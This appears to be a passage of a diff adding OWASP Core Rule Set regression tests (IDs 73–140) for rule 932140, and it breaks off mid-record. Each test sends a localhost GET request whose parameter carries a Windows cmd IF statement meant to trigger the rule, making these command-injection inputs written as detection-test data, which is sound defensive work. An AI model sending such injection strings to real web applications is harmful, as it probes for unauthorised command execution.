"932140" + - test_id: 73 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 74 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 
uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 75 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 76 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 77 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 78 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 79 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 80 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 81 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 82 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 83 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 84 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 85 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 86 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 87 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 88 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 89 + desc: imported test + 
stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 90 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 91 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 92 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 93 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 
+ output: + log_contains: id "932140" + - test_id: 94 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 95 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 96 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 97 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 98 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 99 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 100 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 101 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 102 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 103 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: 
localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 104 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 105 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 106 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 107 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 108 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 109 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 110 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 111 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 112 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 113 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 114 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 115 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 116 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." 
+ version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 117 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 118 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 119 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 120 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 121 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 122 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 123 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 124 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 125 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 126 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 
"OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 127 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 128 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 129 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 130 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 131 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 132 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 133 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 134 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 135 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 136 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 137 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 138 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 139 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 140 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" + version: HTTP/1.0 + output: + 
